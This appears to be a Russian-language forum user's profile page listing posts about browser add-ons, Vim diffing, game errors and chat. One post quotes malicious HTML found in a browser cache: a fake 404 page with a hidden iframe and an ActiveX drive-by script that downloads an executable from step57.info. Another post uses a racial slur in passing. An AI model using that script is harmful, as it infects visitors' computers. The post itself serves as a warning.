Перейти к содержанию

RommeDeSerieux

Граждане
  • Постов

    25
  • Зарегистрирован

  • Посещение

Весь контент RommeDeSerieux

  1. Тем, у кого пропали зогкладки, советую использовать Opera Link.
  2. Всецело одобряю праэкт, хоть и не верю, что он выйдет. Скиллов работы в КС у меня нету, так что помочь не могу, но был бы рад.
  3. Ужас, ты помогал спамерам? Нет слов. У тебя сломалась микросхема, отвечающая за мораль.
  4. Здравствуй, Слава Обливиону!
  5. Мои пять копеек: Сияние — http://ru.wikipedia.org/wiki/Bloom HDR — оно тебе, впрочем, и никому вообще, не нужно
  6. Для начала передай нам способом, отличным от телепатии сообщение об ошибке, которое выдаёт игра. Иногда сделать это можно, нажав Ctrl + C в момент, когда появилось окно с ошибкой. После этого текст сообщения должен попасть в буфер обмена. Если нет — сделай скриншот.
  7. я сбил, своей армией ботов
  8. Спроси у гугля, что такое BitTorrent и как им пользоваться. Собственно, даже есть спросить у него про расширение файла .torrent, который ты сейчас скачал, то будет более чем достаточно информации.
  9. Ну и что, что двачер? Если бы мы постили, например, нигру — понимаю, есть повод говорить «изыди». А так что?
  10. koVboi. Тоже вряд ли попадает в категорию «хороших» по причине забористого мата, но помнить надо =)
  11. Может быть, ты установил сам ImgLikeOpera, а не Cache Fixer?
  12. Я его двумя постами выше запостил.
  13. Тореро, Но зато приходится вручную вглючать javascript каждый раз. Советую YesScript, который работает по принципу чёрного списка: на всех сайтах javascript вглючён, а там, где с его помощью показывается реклама, его можно выглючить.
  14. http://imglikeopera.mozdev.org/cache_fixer.html Но это лишь частичное решение. Надеемся, проблема потери кэша исчезнет в третьей версии. Также можно использовать локальный прокси.
  15. Для блокировки флэша не нужен NoScript, хватит адблока.
  16. Mozilla Firefox с настроенным Adblock Plus. За счёт рекламы можно сэкономить немало траффика.
  17. Существует упрощённая версия этого редактора: http://cream.sourceforge.net/ Открываем первый файл, Window > Split Existing Vertically, кликаем по появившемуся пустому пространству, открываем второй файл. Теперь у нас должны быть открыты два разных файла в двух частях окна. Кликаем в обоих частях на Tools > Diff Mode. А вообще, советую пройти vimtutor. Хотя это займёт полчаса и не освободит от обращений к мануалу, редактирование текста в нём происходит очень эффективно.
  18. http://www.vim.org/ gvimdiff файл1 файл2 http://www.imageox.com/image/172651-gvimdiff.png
  19. Это одно из тех аниме, которые я досмотрел полностью (ибо нуб). Дал посмотреть шефу (мужик лет 40), который до этого не видел аниме вообще, ему понравилось.
  20. Апельсин пореган на двух других тесовских форумах.
  21. Cим подтверждаю, что после посещения страницы форума андорана по ссылке "СКАЧАТЬ" ослом в кэше оного окапывается миленький файлик с названием me[1].html: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>404 Not Found</TITLE> </HEAD><BODY> <H1>Not Found</H1> The requested URL /me2/ was not found on this server.<P> <P>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. <HR> <ADDRESS>Apache/1.3.37 Server at www.step57.info Port 80</ADDRESS> <iframe style="border: none;" src="http://step57.info/traff/index.php" width=1 height=1></iframe> </BODY> <script> var obj_RDS = document.createElement('object'); obj_RDS.setAttribute('id','obj_RDS'); obj_RDS.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36'); var is_obj_adodb = 0; try { var obj_adodb = obj_RDS.CreateObject("adodb.stream",""); is__obj_adodb = 1; } catch(e){} if (is__obj_adodb != 1) { try { var obj_adodb = new ActiveXObject("adodb.stream"); is__obj_adodb = 1; } catch(e){} } if (is__obj_adodb == 1) { try { var obj_ShellApp = obj_RDS.CreateObject("Shell.Application",""); var obj_msxml2 = new ActiveXObject("msxml2.XMLHTTP"); obj_msxml2.open("GET","http://traff.step57.info/me2/data/exe.php",false); obj_msxml2.send(); } } </script>
  22. Отхлёбывая из бутылки йад, пописываю какую-нибудь гадость(в данный момент исправлял досадный баг в beep-media-player, связанный с преобразрванием %20 в пробел в плейлисте) и одновременно треплюсь со всякими там человекоподобными: http://img211.imageshack.us/img211/5484/screenshotuy8.th.png
×
×
  • Создать...